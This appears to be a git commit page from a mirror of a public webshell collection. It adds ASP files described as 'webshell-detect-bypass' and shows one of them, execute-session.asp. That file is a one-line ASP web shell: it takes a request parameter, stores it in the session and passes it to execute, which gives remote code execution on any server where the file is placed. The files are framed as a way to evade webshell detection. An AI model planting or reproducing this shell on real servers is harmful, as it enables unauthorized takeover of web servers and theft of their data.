1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-22 07:39:02 +00:00

webshell-detect-bypass

from: https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/asp
author: Build By LandGrey
This commit is contained in:
Levi Li
2018-12-20 11:41:24 +08:00
committed by GitHub
parent 32be5d26bf
commit 7451dc532b
9 changed files with 333 additions and 0 deletions

1
asp/execute-session.asp Normal file
View File

@@ -0,0 +1 @@
<%if request("LandGrey")<>""then session("LandGrey")=request("LandGrey"):end if:if session("LandGrey")<>"" then execute session("LandGrey")%>